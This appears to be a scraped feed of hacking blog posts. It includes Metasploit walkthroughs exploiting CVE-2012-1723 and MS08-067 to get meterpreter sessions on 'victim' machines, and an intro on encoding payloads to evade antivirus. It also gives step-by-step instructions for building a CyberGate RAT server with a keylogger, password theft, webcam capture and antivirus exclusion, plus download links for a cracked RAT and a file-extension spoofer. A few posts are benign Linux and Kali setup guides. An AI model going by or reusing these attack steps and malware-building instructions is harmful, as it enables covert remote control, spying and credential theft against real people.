Tutorial Target Web Vulnerability]cross site scripting part 1 Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-17508387183396965872013-05-12T03:29:00.001-07:002013-05-12T03:29:21.755-07:00How to connect ssl to backtrack using putty <div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/kTmtFva8jAE?feature=player_embedded' frameborder='0'></iframe></div>
<br />
The video is created by Vishnu Sharma. In this video he has showed u how to run ssh service in u r backtrack or any Linux machine using putty .<br />
<br /><span style="color: #38761d;">The download link</span> of putty: <a href="http://putty.org/">http://putty.org</a>Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-37800427965869481222013-05-12T03:22:00.001-07:002013-05-12T03:22:35.339-07:00Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution <span style="color: #38761d;">CVE-2012-1723</span>: A vulnerability in the HotSpot bytecode <span style="color: #38761d;">verifier</span> where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.<br /><br />Requirement:<br /><br />Attacker Machine: Backtrack<br />Victim Machine: Windows (install JRE un-patched version )<br /><br />Step1: Launch the Metasploit console<br />Open the Terminal in the Attacker Machine(Backtrack).<br />Type "<span style="color: #38761d;">msfupdate</span>" , this will update the metasploit with latest modules.<br />Now type "<span style="color: #38761d;">msfconsole</span>" to get interaction with the Metasploit framework.<br /><br />Step 2:<br />Type "<span style="color: #38761d;">use exploit/multi/browser/java_verifier_field_access</span>" and follow the below commands:<br />
<br />
msf exploit(java_verifier_field_access) ><span style="color: #38761d;"> set PAYLOAD java/meterpreter/reverse_http</span><br />msf exploit(java_verifier_field_access) > <span style="color: #38761d;">set LHOST [Backtrack IP ADDRESS]</span><br />msf exploit(java_verifier_field_access) > <span style="color: #38761d;">exploit</span><br /><br />If you don't know what i am talking about , please read my previous tutorial.<br /><br />Step 3:<br />If you follow the above commands correctly, you will get the following result.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13683540291.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="http://buspic.com/img/file13683540291.jpg" width="320" /></a></div>
<br />
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.<br /><br />Now type "<span style="color: #38761d;">sessions</span>", this will show the list of active sessions .<br /><br />Type "<span style="color: #38761d;">sessions -i 1</span>", this will open the connection to the session with <span style="color: #38761d;">the id '1'</span> and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.<br /><br /><span style="color: #38761d;">References:</span><br />
<br />POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html<br />Metasploit Module: http://www.exploit-db.com/exploits/19717/<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-13427156570386061932013-05-12T03:14:00.002-07:002013-05-12T03:14:27.243-07:00Metasploit Tutorial] Hacking Windows XP using IP Address Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS. If you don't believe me, then read the full article.<br />
<br />In this article i am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250">CVE-2008-4250</a>). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.<br /><br />Details about Server Service Vulnerability(MS08-067):<br />Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.<br /><br />The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.<br /><br />A malicious request to vulnerable system results in complete compromise of vulnerable computers.<br />This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.<br /><br />Exploiting the MS08-067 using Metasploit:<br /><br />Requirements:<br /><br />VirtualBox<br />Backtrack 5<br />Target OS(XP)<br /><br />Step 1:<br /><br />Create Two Virtual Machine(VM) namely "Target" and "BT5". Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.<br /><br />If you don't know how to create virtual machines , then please read this <a href="https://www.virtualbox.org/manual/UserManual.html">VirtualBox Manual.</a><br /><br />Step 2: Find the IP address of Target<br />Open The command prompt in the Target machine(XP). Type "<span style="color: #38761d;">ipconfig</span>" to find the IP address of the Target system.<br /><br />Hackers use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use <span style="color: #38761d;">Angry IP Scanner.</span><br /><br />Step 3: Information Gathering<br />Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.<br /><br />Open The Terminal in the BT5 machine(Backtrack) and type "<span style="color: #38761d;">nmap -O 192.168.56.12</span>". Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13683532421.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://buspic.com/img/file13683532421.jpg" width="320" /></a></div>
Step 4: Metasploit<br />Now open the Terminal in the BT5 machine(Backtrack) and Type "<span style="color: #38761d;">msfconsole</span>".<br /><br />The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.<br /><br />Let us use the Search command to find the exploit modules with the keyword netapi. Type "<span style="color: #38761d;">search netapi</span>". Now you can see the list of modules match with the netapi.<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13683533871.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="http://buspic.com/img/file13683533871.jpg" width="320" /></a></div>
We are going to exploit MS08-067 , so type "<span style="color: #38761d;">use exploit/windows/smb/ms08_067_netapi</span>".<br /><br />Step 5: Set Payload<br />As usual, let use the Reverse Tcp Payload for this exploit also. Type "<span style="color: #38761d;">set payload windows/meterpreter/reverse_tcp</span>" in the msfconsole.<br /><br />Step 6: Options<br />Type "<span style="color: #38761d;">set LHOST 192.168.56.10</span>". Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing 'ifconfig' command in the Terminal.<br /><br />Type "<span style="color: #38761d;">set RHOST 192.168.56.12</span>". Here 192.168.56.12 is IP address of Target machine.<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13683535231.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="http://buspic.com/img/file13683535231.jpg" width="320" /></a></div>
Step 7: Exploiting<br />Ok, it is time to exploit the vulnerability, type "<span style="color: #38761d;">exploit</span>" in the console. If the exploit is successful, you can see the following result.<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13683536201.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="http://buspic.com/img/file13683536201.jpg" width="320" /></a></div>
<br />
Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.<br /><br />CounterMeasures:<br />Update your OS frequently.<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-17661094300274091372013-05-11T03:59:00.001-07:002013-05-11T03:59:33.536-07:00Updating and Linux CommandsBefore we can begin hacking away with Backtrack, we first must do a little updating. Backtrack is contains a ton of programs and frameworks such as Metasploit, which is constantly updated. You may have to update your tools two or three times a week. Also, if you are new to Linux operating systems, you will have to learn how to use the terminal and basic Linux commands. So let’s get started<br />
<br />
Updating Backtrack 5<br /><br />Since Backtrack is based on Ubuntu 10.04 (which is based on Debian), it has the apt-get command. Apt-get is a powerful command-line tool that is used for installing new software packages, updating, and even upgrading the operating system. We will use this command to get the latest version of Backtrack. After logging in to Backtrack, open a terminal (Applications > Accessories > Terminal):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682689241.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://buspic.com/img/file13682689241.png" width="320" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
Then issue the following command:</div>
<blockquote class="tr_bq">
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade </blockquote>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682693351.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://buspic.com/img/file13682693351.png" width="320" /></a></div>
The command will then select all the new updates for Backtrack, and after a short time it will ask you to continue. Press ‘y’ for yes<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682697891.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://buspic.com/img/file13682697891.png" width="320" /></a></div>
<br />
If you just installed Backtrack, this update will take about 15-20 minutes. Keep an eye on the console for when it asks “Do you want to continue?”. Again, press ‘y’ for yes. You will want to run the command apt-get upgrade && apt-get upgrade once a week to keep Backtrack up-to-date.<br />
<br />
Linux Commands<br /><br />There are many Linux commands, and they can be used in various combinations. I will list a the basic ones which you should learn if you are new to Linux and Backtrack. Most commands can have parameters which gives them added functionality. To see the parameters, or to learn what a command does, add -h or –help after them.<br />(Example: cat –help).<br /><br />cat – This is command is short for “Concatenate” and prints out the standard output<br />Example: cat filename<br />cd – Change Director. Switches the current directory you are in.<br />Example: cd foldername<br />Example: cd root/Desktop/<br />clear – clears the terminal screen.<br />ls – List the files and folders within the current directory. (Note that is ‘L’ not ‘i’)<br /><br />mkdir – Make Directory. Create a new directory of the given name<br />Example: mkdir myFolder<br />ping – Send a packet to a host and waits for a response.<br />Example: ping -c 4 google.com (The -c 4 parameter limits the ping to 4 counts).<br />rm – Remove. Removes a file or folder.<br />Example: rm filename <br />
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-74004088318164653012013-05-11T02:57:00.001-07:002013-05-11T02:57:51.630-07:00Metasploit Tutorial: Introduction1.<a href="http://backtracktutorials.com/metasploit-tutorial/#terms">Metasploit Terms</a><br />2.<a href="http://backtracktutorials.com/metasploit-tutorial/#console">MSFconsole</a><br />3.<a href="http://backtracktutorials.com/metasploit-tutorial/#cli">MSFcli</a><br />4.<a href="http://backtracktutorials.com/metasploit-tutorial/#armitage">Armitage</a><br />5.<a href="http://backtracktutorials.com/metasploit-tutorial/#payload">MSFpayload</a><br />6.<a href="http://backtracktutorials.com/metasploit-tutorial/#encode">MSFencode</a><br />
Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These metaspolit tutorials will help you get up and running with metasploit. Most of our hacking will be targeted to windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!<br /><br />Recommended Reading: <a href="http://www.amazon.com/gp/product/159327288X/ref=as_li_tf_tl?ie=UTF8&tag=novice2guru-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=159327288X">Metasploit: The Penetration Tester’s Guide</a><br />
<br />A Book that will show you most of the metasploit framework. However, it leaves you to discover the true power of metasploit for yourself. Overall, highly recommended.<br />
<br />
Metasploit Terms<br /><br />Exploit – to take advantage of a security flaw within a system, network, or application.<br />Payload - is code that our victim computer to execute by the metasploit framework.<br />Module - a small piece of code that can be added to the metasploit framework to execute an attack.<br />Shellcode – a small piece of code used as a payload.<br />MSFconsole<br /><br />Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type:<br />
<blockquote class="tr_bq">
root@bt: ~# cd /opt/framework3/msf3/<br />root@bt: ~#/opt/framework3/msf3# msfconsole</blockquote>
After sometime, the msfconsole will boot.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682649261.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13682649261.jpg" /></a></div>
<br />
To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.<br />
<blockquote class="tr_bq">
msf > help connect</blockquote>
MSFcli<br /><br />Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type:<br />
<br />
<blockquote class="tr_bq">
root@bt:~# cd /opt/framework3/msf3<br />root@bt:~# msfcli -h </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682651011.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://buspic.com/img/file13682651011.jpg" /></a></div>
Now we are going to do a little test run of msfcli. It’s important to note whenever you’re learning metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:<br />
<blockquote class="tr_bq">
root@bt:~# msfcli windows/smb/ms08_067_netapt o </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682651971.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://buspic.com/img/file13682651971.jpg" width="320" /></a></div>
This module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.<br />
<blockquote class="tr_bq">
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682653471.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://buspic.com/img/file13682653471.jpg" width="320" /></a></div>
we can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the ned of the msfcli argument string.<br /><blockquote class="tr_bq">
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682656231.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://buspic.com/img/file13682656231.png" width="320" /></a></div>
Note: the IP address assigned to RHOST is a windows XP machine that I have on a virtaul machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with windows updates. We will go over this more in-depth later on.<br />
<br />
The armitage component is a fully interactive graphical user interface.<br /><br />Running Armitage<br /><br />1Run the command armitage.<br />2Select Start MSF. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682658931.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="http://buspic.com/img/file13682658931.jpg" width="320" /></a></div>
MSFpayload<br /><br />The msfpayload component of metasploit that generates shellcode, and executables. Shellcoe can bew generated in many formats including C, Ruby, JavaScript and even Visuabl Basic. Each output will be useful in various situations.<br /><br />For msfpayload help type: root@bt~# msfpayload -h<br /><br />Just like msfcli, if you need to find out the required options, append the letter O on the command line.<br />
<blockquote class="tr_bq">
root@bt:~# msfpayload windows/shell_reverse_tcp O </blockquote>
MSFencode<br /><br />The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.<br /><br />In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.<br /><br />Enter msfencode -h to see a list of msfencode options.<br /><br />Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well known encoder is the: x86/shikata_ga_nai encoder.<br /><br />To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.<br />
<blockquote class="tr_bq">
root@bt:~# msfencode -l </blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682661211.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://buspic.com/img/file13682661211.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-3442336230975917302013-05-11T02:26:00.001-07:002013-05-11T02:26:20.842-07:00How to Install Software's in Kali Linux <div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaku_mE657ZsK7Yk92dDiQBh3gi4kXH6VXZQL1TOlI94oHYr2hxt5Pf5ndZMSIkm37HsSTD7sCXE-PkiSV8PG4CAs0Vld1YpODkBNyw1QlwZsWYwwbUAXmO0yrAkBGy0ke7F15ww_L6Xk/s1600/2013-05-12_163350.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaku_mE657ZsK7Yk92dDiQBh3gi4kXH6VXZQL1TOlI94oHYr2hxt5Pf5ndZMSIkm37HsSTD7sCXE-PkiSV8PG4CAs0Vld1YpODkBNyw1QlwZsWYwwbUAXmO0yrAkBGy0ke7F15ww_L6Xk/s1600/2013-05-12_163350.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Kali Linux is the next generation and advance version of Backtrack Linux, it is more stable, secure and upgraded version of Linux based on Debian. It has been designed for Penetration Tester and Information Security professional and students, it contains all the necessary tools to conduct a successful penetration testing on web application, network, VoIP and WiFi. <br /><br />Beside ethical hacking tools, a Linux distribution must have necessary utilities and software's so that it can become the first desktop operating system. Kali Linux is stable and it can load required drivers automatically, and it also has Add/Remove Software utility from where you can manage your software's. It already has necessary tools installed from Document viewer to VLC player, but some tools that are required for a desktop computing are not installed and you need to install / configure them by yourself. <br /><br />This article is the discussion of software's installation in Kali Linux, you can install as many software's as you want but I will discuss the installation of some important software's for example:<br /><br />Skype (for communication)<br />Open Office<br />Flash<br /><br />When Backtrack 5 was launched, we have discussed the installation of important software's on it but now the time has changed and we have Kali Linux so we will discuss the installation on it.<br /><br />How to Install Skype in Kali Linux<br />The first step is to get Skype from its official <a href="http://www.skype.com/en/download-skype/skype-for-linux/">website</a>, make sure to select your distribution carefully. For Kali choose Ubuntu 10.04 and download it.<br />
<br />After downloading open terminal and locate the download directory, and install it by using dpkg -i command:<br />
<blockquote class="tr_bq">
Root@ehacking:~/Downloads# sudo dpkg -i skype-ubuntu-lucid_4.1.0.20-1_i386_001.deb</blockquote>
How to Install Open Office in Kali Linux<br />
<br />Open office is a wonderful alternate of MS office, the easiest way to install open office is by using terminal and command "apt-get install openoffice.org" but one of our user has discussed about the repositories problem in Kali Linux. We have also seen that the debain repositories is not working properly hence you cannot install packages by using the terminal. The solution is as follows:<br />
<br />Necessary changes are required for Apt Repositories, kindly follow the steps mentioned below:<br />
<blockquote class="tr_bq">
root@ehacking:~# cd ..<br />root@ehacking:/# ls<br />bin etc lib mnt root selinux tmp vmlinuz<br />boot home lost+found opt run srv usr<br />dev initrd.img media proc sbin sys var<br />root@ehacking:/# cd etc/apt<br />root@ehacking:/etc/apt# nano sources.list </blockquote>
<br />
<br />
<br />
<br />
Important: Do not delete the lines that are already present on the source file, just add the following repositories in this file: <br />
<blockquote class="tr_bq">
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main contrib non-free<br />deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main/debian-installer<br />deb http://http.kali.org/kali kali main contrib non-free<br />deb-src http://http.kali.org/kali kali main contrib non-free<br />deb-src http://security.kali.org/kali-security kali/updates main contrib non-free </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682639011.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="http://buspic.com/img/file13682639011.jpg" width="320" /></a></div>
Press CTRL O than enter and than CTRL X for exist, you are almost done. Next step is to update your Linux, on terminal type apt-get update<br />Now it is very easy to install software's by using terminal for Office type:<br />
<blockquote class="tr_bq">
# apt-get install openoffice.org </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682640761.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="http://buspic.com/img/file13682640761.jpg" width="320" /></a></div>
How to Install Flash in Kali Linux<br />
<br />
<blockquote class="tr_bq">
# apt-get install flashplugin-nonfree</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://buspic.com/img/file13682642201.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="http://buspic.com/img/file13682642201.jpg" width="320" /></a></div>
Now your Kali is ready to install as many software's as you want.<br />
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-27045445556554042592013-05-07T22:16:00.005-07:002013-05-07T22:16:53.059-07:00CyberGate RAT COMPLETE TUTORIAL <div style="text-align: center;">
CyberGate RAT Setup TUTORIAL</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-J8Sgk6DSJFY/UBkYEu3bc_I/AAAAAAAAAZY/hij1zFTmNb0/s1600/RCx68008.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-J8Sgk6DSJFY/UBkYEu3bc_I/AAAAAAAAAZY/hij1zFTmNb0/s1600/RCx68008.png" /></a></div>
CyberGate Features:<br /><br />- Reverse connection Remote Administration Tool.<br />- BaseCode64, Xor, RC4 and AES traffic encryption (depends on features, etc … <br /><br />- Language support<br />- View options<br />- Multi port support<br />- Remote connection search option<br />- Injection option to create new servers<br />- Anti debugging options to create new server<br />- Startup methods option to create new server<br />- Password protection method to create new server<br />- Optional binder option to create new server<br />- Icon changer option to create new server<br />- Delayed execution option to create new server<br />- Customizable installation folder and file name to create new server<br />- Ftp logs support<br />- Automatic DNS updater<br />- Multi profiles builder<br />- UAC (Vista and Seven protection) bypass on server<br />- Keylogger option<br />- Password recovery tool (browser, msn, windows …)<br />- Very light stub (~280kb)<br />- Chat feature<br />- File manager<br />- Registry editor<br />- Services manager<br />- Windows manager<br />- Processes manager<br />- Clipboard manager<br />- Socks 4/5 Proxy<br />- Http Proxy<br />- Mass features<br />- Installed programs manager<br />- Remote desktop (with capture)<br />- Remote webcam view (with capture)<br />- Capture audio<br />- Remote download and execute<br />- DOS prompt<br />- Send message boxes<br />- Control desktop items (taskbar, icon, start menu)<br />- Active ports list<br />- Server control (update, disconnect, restart)<br />- Remote open HTTP URL<br />- Send file and execute<br />- CD Open and Close<br />- Reverse Mouse Option<br />- Remote Power Options (Shutdown, Restart, etc …)<br />- Remote Mouse Lock<br />- Remote Keyboard Lock<br />- Remote Icons Hide/show<br />- Remote Start Hide/show<br />- Group support (connections can be organized in groups)<br />- Several function that can be performed from group panel<br />- URL visiter (with hidden feature)<br />- VBscript console<br />- Multi-user keylogger/file search<br />- Local file erases tool (erase files beyond recovery)<br />- Local startup manager tool<br />- Startup manager<br />- Programs assist<br />- Connection log incorporated in the client GUI<br />- CyberGate has task managers for client and server on connecting<br />- Task logs<br />- Add Notes for your connections if you want<br />- Multiple tabs in the client making your life easier (connections tab, group panel tab, client tasks tab, etc …)<br />- Automatically map ports if your router supports uPnP<br />- GeoIP server tracking for accurate remote computer localization tracking<br />- Easy search function on password recovery tool<br />- Thumbnails view on file manager allowing display all images of a remote folder<br />- Lock station <br />- Webloader (a webdownloader with 3.5 Kb)<br />- Windows OS bit system (x32/x64)<br />- Recoded webcam capture<br />- Recoded password recovery<br />- Run remote files as admin<br />
<br />Setup Instructions :<br />
<br />Open Up Cybergate..<br /><br />Now click Control Center - Start<br /><br />Click Control Center - Options - Select Listening Ports And Do Following:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cerberus_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://i747.photobucket.com/albums/xx120/Darhe/Cerberus_4.png" width="320" /></a></div>
Good, You Are Done With The Settings! Now, let's move on to the Virus Creation :).<br />Click Control Center - Builder - Create Server. Make a new User named Hacking. Press Ok. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_5.png" width="320" /></a></div>
Mark the user "Hacker" And press Forward.<br />Now you should have something like this;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_8.png" width="320" /></a></div>
Press 127.0.0.1 | Port 999 and press Delete..:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_9.png" width="320" /></a></div>
After that, Click Add.<br />Now, A Box should pop up saying: 127.0.0.1:81. Like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_11.png" /></a></div>
Instead of 127.0.0.1:81 change that to (your local ip)192.168.1.5:81<br /><br />Now Change the<br />Identification: remote<br />Password: cybergate<br /><br />To This:<br />Identification: CyberGate<br />Password: Computermaniac<br /><br />Good! You are now done with that :). Let's move on to "Installation"<br />Use the Exact same settings as i do. :<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://i747.photobucket.com/albums/xx120/Darhe/Cybergate_15.png" width="320" /></a></div>
Good, We Skip Message. We Skip Keylogger. In the Anti Debug Have everything checked<br />In The Build Server: Use Google Chrome Passes and UPX.. (Makes the server smaller)<br />And press Create Server. Good, You do now have your RAT server complete!<br />If your RAT doesent work. check following things:<br />Non-Connecting RATs<br /><br />You have properly port-forwarded if using a router.<br />The password in Listening Ports and the password your server uses are identical.<br />You are Listening on the correct ports.<br />Your Firewall is letting connections through on the port you're listening on.<br />Your server is added to excluded files in your Antivirus and Firewall.<br />Your server injects explorer.exe instead of the default browser.<br /><br />How to port forward..<br />Go to Portforward.com and lookup your Router, there shall be a guide on how to port forward on it :). and if you are on a modem.. then you don't need to port forward.<br />Enter Start - Run . Command. Type Ipconfig<br />The ip which is in the "Standard Gateway", That is your Router IP. <br />Type that into your web browser. Log in, And Port forward port: 81.<a href="http://www.4shared.com/get/CS8gKqcy/CyberGate_v1180_-_Cracked_Vers.html;jsessionid=047EB1B74436EA91814F6682823CA132.dc323">Download Here</a>.PassRar:computermaniac<br /><br />
<br />
<br />
<br />
<br />
<div style="text-align: left;">
<br /></div>
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-7713117673756526082013-05-07T22:01:00.000-07:002013-05-07T22:01:58.509-07:00File Extension Spoofer & Pumper <div style="text-align: center;">
File Extension Spoofer and File Pumper</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEAo1Zj-BRWXj12nWo_gfqGL9sYquZjD6tGmu9sxKPrVQb-2kZTuF-7K0jRiqzp_i8XYcsV_BmvAzejrl-Fg6rrSYiFXXWQk6xETT2SMCTMg8xJZGj1H9GNHKQy5d0FCpJoNF6yajo6kBW/s400/The+Rats+Crew+-+AIO_2011-07-22_13-07-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEAo1Zj-BRWXj12nWo_gfqGL9sYquZjD6tGmu9sxKPrVQb-2kZTuF-7K0jRiqzp_i8XYcsV_BmvAzejrl-Fg6rrSYiFXXWQk6xETT2SMCTMg8xJZGj1H9GNHKQy5d0FCpJoNF6yajo6kBW/s320/The+Rats+Crew+-+AIO_2011-07-22_13-07-35.png" width="320" /></a></div>
This is an amazing program that will change the extension on your files and allow you to pump the size on them. This tool was designed by The Rat Crew.<a href="https://hostr.co/kKw29MHp0xCH">Download Here</a><br /><div style="text-align: center;">
<br /></div>
